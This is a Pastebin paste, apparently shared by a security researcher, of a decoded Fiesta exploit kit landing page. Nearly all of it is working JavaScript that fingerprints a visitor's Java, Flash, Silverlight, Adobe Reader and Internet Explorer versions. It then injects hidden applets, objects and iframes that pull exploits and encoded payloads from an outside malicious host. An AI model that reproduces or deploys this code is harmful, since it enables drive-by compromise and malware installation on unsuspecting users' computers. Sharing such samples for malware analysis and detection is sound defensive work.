Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #####
- Decoded Fiesta exploit kit landingpage
- @tehsyntx
- thembits.blogspot.se
- #####
- <html>
- <head>
- <title>page</title>
- </head>
- <body>
- <script>
- function loom7t(jq, toa) {
- return jq.test(toa)
- }
- function puisw() {
- var hr;
- hr = window.navigator.userAgent;
- return loom7t(/x64;/i, hr) || loom7t(/Win64;/i, hr)
- }
- function gantz(trq) {
- return typeof trq != 'undefined'
- }
- function idol6c(k0) {
- var sux;
- sux = window.document.createElement('div');
- window.document.body.appendChild(sux);
- sux.innerHTML = k0
- }
- function rinkhb(jc) {
- var bw58;
- bw58 = window.document.createElement('iframe');
- bw58.frameBorder = '0';
- bw58.width = 10;
- bw58.height = 10;
- bw58.src = jc;
- window.document.body.appendChild(bw58);
- return bw58
- }
- function bongr() {
- if (loom7t((/Trident\/(\d)/i), window.navigator.userAgent)) {
- return parseInt(RegExp.$1)
- } else {
- return 0
- }
- }
- function goshos(vu, ag, cm) {
- return vu.replace(ag, cm)
- }
- function wiryc3(wd) {
- return (typeof wd == 'string' && loom7t(/\d/, wd))
- }
- function tachjt(yd) {
- var ml, af;
- ml = wiryc3(yd) ? /[\d][\d\.\_,-]*/ .exec(yd) : null;
- af = /[\.\_,-]/g;
- return ml ? ml[0].replace(af, ',') : null
- }
- function gayse(ckl, z3t) {
- var nx, ve, y1r;
- y1r = ['0', '0', '0', '0'];
- ve = tachjt(ckl.replace(/\s/g, '')).split(',');
- for (nx = 0; nx < ve.length; nx++) {
- if (!loom7t(/\d/, ve[nx])) {
- ve[nx] = '0'
- }
- }
- return ve.concat(y1r).slice(0, z3t)
- }
- function jude8(kqq, t9, ad3) {
- while (kqq.length < t9) {
- kqq = ad3 ? '0' + kqq : kqq + '0'
- }
- return kqq
- }
- function burn1y(f2) {
- var mq, inb;
- mq = 0;
- while (mq < f2.length) {
- try {
- inb = new ActiveXObject(f2[mq]);
- if (inb) {
- return inb
- }
- } catch (exc) {}
- mq++
- }
- return null
- }
- function mist5() {
- return gantz(window.ActiveXObject)
- }
- function stancf() {
- var wyl, efy, ew7, df, juf, epoy, ed0o;
- try {
- juf = null;
- efy = ['clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA', 'clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'];
- for (epoy = 0; epoy < efy.length; epoy++) {
- ed0o = window.document.createElement('object');
- ed0o.setAttribute('classid', efy[epoy]);
- if (gantz(ed0o.jvms)) {
- juf = ed0o.jvms;
- break
- }
- }
- if (juf != null && juf.getLength() != 0) {
- wyl = 0;
- for (epoy = 0; epoy < juf.getLength(); epoy++) {
- ew7 = gayse(juf.get(epoy).version, 4);
- df = parseInt(ew7[1].concat(jude8(ew7[3], 2, true)), 10);
- if (df > wyl) {
- wyl = df
- }
- }
- return wyl
- }
- } catch (exc) {}
- return null
- }
- song1w = stancf(); //Check Java version
- function weftlo() {
- var q;
- if (window.navigator.javaEnabled()) {
- if ((song1w && song1w > 458 && song1w < 722) || (!song1w && window.navigator.javaEnabled())) {
- q = "<applet width=10 height=10><param name='trod' value='http://gpoison.in.ua/d9gj8h5/50512c02f4cd99905648500a005802000208010a060100090003575556560405;1;3@@'/><param name='jnlp_href' value='http://gpoison.in.ua/d9gj8h5/0929524ae53676ff5a575e0207090653070106020150045a050a505d51070056'/></applet>";
- if (song1w && song1w >= 710) {
- q = goshos(q, '</applet>', "<param name='javafx_version' value='2.0+'/></applet>")
- }
- idol6c(q)
- }
- }
- return
- }
- weftlo(); //Load Java exploit
- function cookj() {
- var t9, zv;
- if ((song1w && song1w < 631) || (!song1w && window.navigator.javaEnabled())) {
- zv = 'aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200095b4c746f616462713bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003';
- t9 = "<applet archive='http://gpoison.in.ua/d9gj8h5/6098c8929c7856505742580351030b0001080d03575a090903035b5c070d0d05' code='cutsxw' width=10 height=10><param name='dens' value='http://gpoison.in.ua/d9gj8h5/666d1bbbf4cd9990554e535f03595050010e025f050052590305540055575655;1;2@@'/><param name='puff' value='x_egX'/></applet>";
- t9 = goshos(t9, 'x_egX', zv);
- idol6c(t9)
- }
- return
- }
- cookj(); //Load Java exploit
- function sawsl() {
- var jc5, wrc, y;
- try {
- if (bongr() == 7 || mist5()) {
- jc5 = burn1y('ShockwaveFlash.ShockwaveFlash');
- if (jc5) {
- y = gayse(jc5.GetVariable('$version'), 4);
- wrc = jude8(y.slice(0, 3).join(''), 6, false);
- return [wrc, y[3]]
- }
- }
- } catch (exc) {}
- return null
- }
- mustz = sawsl(); //Check Flash version
- function grayh() {
- var irz, pt7, ssq, lhi, ft;
- pt7 = 155212;
- pt7 -= 45212;
- ft = 129925;
- ft -= 9925;
- if (mustz != null && mustz[0] >= pt7 && mustz[0] <= ft && (mustz[0] != ft || mustz[1] < 43)) {
- ssq = 'http://gpoison.in.ua/d9gj8h5/1a76467ec4de90654216510d060d05570659030d0054075e0452555250030352';
- ssq = [ssq, mustz[0], mustz[1]].join(';');
- lhi = "<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='UAodS'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='kidsl=CJHhj'/><param name='Play' value='0'/></object>";
- lhi = goshos(lhi, 'CJHhj', 'D3Ixoj9OWOXFiHqsKm343y_pTB1lL6n1PQLCGcZw1ew2FTx1j-vMzRTb628HlqjUD42gK3Kt5y6e3IytchqIaOYilQ1lJ6GzWWKFyT-_Tcg-uju6V-kh2-vQNWI0sibgHozhnWygcWjTwbneLG-fogW-fXS8rENwZL0i5ZtrIQOKImQbeKVEgPbK4Y6FrWyQi2HwSngn0OJm4KhRlUAeLSBsP722D0Bf4Fw_0PilOPqBZ5t5B5m0F4D5BsCSd8GF_yWGFsgZiOR9UH4IORBx06VAaf04QxB4RbMURrAzDDVrCSk1pS0e3CFepHVRyFi2JOnFJKy09Tl0ouZUYstSwOsoQcNQj2FjPfcBsnRrMoGHSMi8okF3PX7uuOiPGjWPryOcNsXgx8qZiXENElV_j4GycYQFuf1722B3tfSrSKjOuKA0kx04-L6rvPfybvWIbU6PZ_LKbSWHL-7VQgtP76Y7XjW3esEHXdBpDvXkbDIpqES2TlC1MykmrWBgcPGvcg6N9UwMrO0FFhebAhw4eZZ3Ry6erQAG92A4ASmUc03_Bqa0_WI6DKlxvAvdJcID7DHdcLZ63Mr-f7pHHBULIZCRJKlmgZ8kLOh3o_loxoRXYAxuc_6jescj1K2cTTvqlhmup6OCkeu--tSRxofNY7P4Zx_bE18o4OxUh-2Ogz3jyW3iZqejXINrGdcyk-E16zN2lfcZscitMIrSQmTEsfrxY_8PIT4Qz67C5rA2aXUjm86Zhu553hSVaqeJwBz4qRCPDxKtL1TaczScMMz4xfMBhQzY3ZGYPCY-cg3R1B6YBCUiTyBqN9ZDZnG8eUVnj4VGH1TA91ScoDRGpZdGcrgObPJFTiSt26tJSORn_q0jaa-X46_uQwz56uDtVdhycXRM3l04urvHgUWXh2LUuViUsVidtVihs9YLvCapacJdM0ums0ums-Gl1p-Sx6N-H92evHUowXJUdDp94LklN7eUUhfBxOTpZT5wBIawTcAYmZaARK0FRAKGkoQwd6flkh5onaQxv6xGs7xG0wxGgjCp4pCxqcOpBM3wCou_UqZEbOZqZou2GVrRAww5qlmkFB6N2_QoVDMDcuTvAc87pRhBYADbtmRHaim505gPmm8RPzlV3kgLjSTIN3nt_Xdew_nidYmaN_qcbg13f7nh_btrtj383BGsIK-jm6LQvt-2WzyEdORZ3Lt8cgdBkHgylY4aU2hU9hB-c0B1_ACV9rU-iLZVEcUntsUlIsz-7Q1Amsg01WdfF-uvkaiOaBsOsRiHKzNOnroO8Jv-2COvYCL6YCSfYCdfX6LXzW7ToiyRa87RDPrfkwhldPRONE4jt6t7ywX_SKTL8HW1ydOx6uJMAd_5NuRduHmaRIuZ8ZgHtZvLTw1KP2frT74rFg57qzF92Mms3Y2zhDd4Dczo48SPPL4L_lxsCrND61nPMPSGlvMY5xyDvQ7Uy1JBL9G-OgObYDA03gA0D7CwJwkdOyGwawx28jjz6OG28AmiOEwA4Dn9w9g-7kjHyXjTq-PSObN-ObfoYOfE3YiurjfR0lF7oFQIBFFqBhFqBijLBVTRD5wUACwnEXNcIXuxLai3nbeaRNwfIAtFx9zesJLQ3Cl6-PInZaHDuU4lnkNPqV_TcLwrdQvPDFIa9nfzkLIzeA5_7uVjpkaqnGc3MEimmCY7vgzI4-dJTOsDADjEwKwbP2CM9pFZfZZabLdTPPaBfvLF1M6CARLhhsrMUmlwV0i_Kb8NKb8NJM2lmJZ5owUgFvng9Ing57Tg57d4cpR8urTosifZK-io1yfS6vX4YVN4BvFL1jFCaVvLMRUCYPRGSmR7VCRHRewgdCGoXMwueaGY3YiS31i4rYf4_QX_0NF0_Qvq02PLDCOeoCx5eUN0YEvuIg');
- lhi = goshos(lhi, 'UAodS', ssq);
- idol6c(lhi)
- }
- }
- grayh(); //Load Flash exploit
- function pigs5(a7j) {
- return (a7j < 10 ? '0' : '') + a7j.toString()
- }
- function malao(br) {
- return (br[0] + '.' + br[1] + '.' + br[2] + pigs5(br[3]) + pigs5(br[4]))
- }
- function rasee(tzb, bry, sk, cv) {
- var m6c;
- m6c = bry.slice(0);
- m6c[sk] = cv;
- return gauli(tzb, m6c)
- }
- function gauli(i3, xw) {
- var auj, cxq, sv8;
- try {
- return i3.IsVersionSupported(malao(xw))
- } catch (exc) {}
- return false
- }
- function inchvv() {
- var t1, hrv, x9, rt0, pj, dam, yd, w5;
- yd = null;
- hrv = null;
- try {
- if (bongr() == 7 && (yd = window.navigator.plugins['Silverlight Plug-In'])) {
- hrv = yd.description;
- } else if (bongr() == 7 || mist5()) {
- x9 = burn1y('AgControl.AgControl');
- rt0 = 0;
- t1 = [1, 0, 1, 1, 1];
- pj = [6, 2, 9, 12, 31];
- if (x9 && gauli(x9, t1)) {
- for (w5 = 0; w5 < pj.length; w5++) {
- for (dam = t1[w5] + (w5 == 0 ? 0 : 1); dam <= pj[w5]; dam++) {
- if (!rasee(x9, t1, w5, dam)) {
- break
- }
- rt0++;
- t1[w5] = dam
- }
- }
- if (rt0) {
- hrv = malao(t1)
- }
- }
- }
- if (hrv) {
- return gayse(hrv, 3).join('')
- }
- } catch (exc) {}
- return null
- }
- cups7 = inchvv(); // Check Silverlight version
- function bonoa() {
- var l8z, cj, , bn, o7n;
- l8z = 4243834;
- l8z += 876291;
- bn = 2648393;
- bn += 1402008;
- if (cups7 >= bn && cups7 < l8z) {
- cj = 'http://gpoison.in.ua/d9gj8h5/5fdb77861a072673460a1259050c0a04025e50590355080d0055060653020c01';
- cj = [cj, cups7].join(';');
- o7n = "<object data='data:application/x-silverlight-2,' type='application/x-silverlight-2' width=10 height=10><param name='source' value='yqobs'/><param name='initParams' value='gael=YOsTWLlxBQAASYA0CBeFyXX3/9Bhw+jo/////psTFxdJnuSaRL+uSWasR69ld2BjRf+TFBcX657guob0A/+RFBcXhbqG9OWex/+4FBcXvPzlrq5kJsCvY3ajF30X/08UFxf/KRQXF4DoRAMrEWUjR0N9H33o6EQvTYb0MEdDfxcHFxdAfQ5F6EQrhk/0ApwQGKFfFl6aU58fnB+X6jdkFOlUuf9jFRcXhvRlJte7ktdjQkdA6ERXQUBA6ERTTxbR/+8WFxeG9EJ9HE9fY1hHl2y5FmMG/64WFxeS12I06ARxKvMVYvOXbPoXYhpA/yQXFxeS12Ic6VT6/wQWFxeG9N5PuhbR/LOAmmRvQbsuKWLs0BEsJhcXSf/oFhcX1H0XfenoRBNBQEKe8q5MgzyD/4MVFxeG9GlGmkSPRehEI5LXY2WcRyue0Z7QFJMHlxcXF5wf9Hd3FGcbJteO7v/BFRcXYu+W7UlmrEd2YxKU1wP8yOhnBxbZJt5eVrqS12MiQZpjEBUm147v/70VFxdi75btQGPX40li9kkW6ZwjmU6cRiucUwYLFFsGOxbfLtllEy7RYR8m195ISdUTF0GcYgdBupLXYuyQ4EmaRIlFQehER4b090ZGRuhEW07RFhdHQUDoRFNP0RdLQEBBkOm6ktdi7H1oQehEJ5orEZpUuEdA6EQbfRdB6ELrlO8IYL/8s0FAQp7ynum6ktdi7EFAmmz5kOm7cbyT12LummjpQOhEO0DoRF9JfStOPtue8EZAJtfkvUiYEH1kf3kXdhd/ZRdiF55wG654giYHr7gHHL//QhYXF55QH31yf3IXbxd/cxc5F390F3oXnnAHnmADrrwzwMCvYfb40UD/PBYXF95ISdRAQp7yfUNOPtue7Z7wQCbX5L1ImlgHfVOYFkBGR0dHR0dHR0XoRD/eSNRAQSbXR0d9Fkd9FH0UQOhED1djDl+Aun0XQ0dBQOhEC5LXYx5A6EQ3QOhEM1dJSNRBRJ7pJteO6dE+xhbAQEYmzI7p1J0TCRfVkRMBnxMJFRMBnRMRJRC99f9OSExJ1EIm3kae9UZGRUFGrsqbtgCvuinG1v+TFxcXSpLXYnGS6GNznFIXfRdAQuhHJ5LXYkOcUB+S12NaR0NH/14XFxeBQUKcUhfoRxtOktdiILqFuibHKlFEQ0diPLomxy7fYjO6JsdHkOCU/gf/dejo6EZAfRfoRB9OLt9iHeghQehEO5Dg/BUm10rUrhcHFxeS12IVnt99V0ZHfRfoRAfUR/8fFxcXTv8gFxcX6PdAQUQm6HOcaCecaBucaAOe7CbXjpwoLuxjAJxgP5LhY+fu/14XFxe7YuAu3ZxQB2L3TElI1HecRyue1J7RRxRTB28m+lJ3FE83FCO8JteO7/8MFxcXYu8u3XZi/xRPMxigO3wUZwtPFBO5nlMzC3bUu2QRK3ZlFTs31t0aFtWT19R/e355fBdLF1sXeBdgFxcXYmV7enh5F0t0enM5cm9yHks5OUt5eGNyZ3ZzOXJvcjc4dDd0eGduNzhONzUyRDU3NTJENTcxMTdkY3ZlYzc1NTc1MkQ1Fzh0N2RjdmVjNzU1Nxf/eOzo6LF8gsjCvCaUbP3Wa6+YGWKOrOH3FxcXF0lmrEdpmrNF22kZHBf3zKpEV+jfi6jeOftoz6iIolfjzUuZRzzQGtlld2BjFxcXF0gfrkzi320vzMnBZRcXFxdATFx0CYJ8kHjrIDOe26rfCAeE/P13kKwXFxcXFxcXF39jY2ctODhwZ3h+ZHh5OX55OWJ2OHMucH0vfyI4JS8kdiF0LyckcXQhdiEkISImIy8iLyJ2JyMiLyd2JyUnIicnJyAidiclJyYnLyd1JyAndSImJyIiJSIhJ3QnICwiFxcXFw=='/></object>";
- o7n = goshos(o7n, 'yqobs', cj);
- idol6c(o7n)
- }
- }
- bonoa(); // Load Silverlight exploit
- function bins7() { // If IE 4-6 and not x64
- var lgb, ps, gb;
- lgb = bongr();
- if (!puisw() && (lgb == 6 || lgb == 5 || lgb == 4)) {
- gb = 'http://gpoison.in.ua/d9gj8h5/5be2605ccb74a5cc5c070909040b0751025a5109025205580051075652050154';
- rinkhb(gb)
- }
- return
- }
- bins7(); //Load IE exploit
- function snagng() {
- var cu, x6, xj2z, tkx, jb3, ht0, xaw;
- try {
- xj2z = null;
- tkx = (bongr() == 7 || mist5()) ? burn1y(['AcroPDF.PDF', 'PDF.PdfCtrl']) : null;
- x6 = window.document.createElement('object');
- x6.setAttribute('classid', 'clsid:CA8A9780-280D-11CF-A24D-444553540000');
- x6.setAttribute('src', '');
- try {
- xj2z = (tkx || x6).GetVersions()
- } catch (exc) {}
- if (xj2z) {
- xaw = xj2z.match(/=\s*[\d\.]+/g);
- ht0 = 0;
- for (jb3 = 0; jb3 < xaw.length; jb3++) {
- cu = parseInt(gayse(xaw[jb3], 3).join(''), 10);
- if (cu > ht0) {
- ht0 = cu
- }
- }
- return ht0
- }
- } catch (exc) {}
- return null
- }
- byesw = snagng(); //Check Adobe Reader/Acrobat version
- function koch96() {
- var fb, sc, vp4;
- vp4 = bongr();
- if (vp4 == 4 || vp4 == 5) {
- if ((byesw >= 800 && byesw < 821) || (byesw >= 900 && byesw < 931)) {
- sc = 'http://gpoison.in.ua/d9gj8h5/640195d4e800c0815a5d520a0b0e5606010c040a0d57540f030752555d005003';
- sc = [sc, byesw].join(';');
- fb = "<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' width=10 height=10><param name='src' value='giExL'/></object>";
- fb = goshos(fb, 'giExL', sc);
- idol6c(fb)
- }
- }
- return
- }
- koch96(); //Load Adode Reader/Acrobat exploit
- </script>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement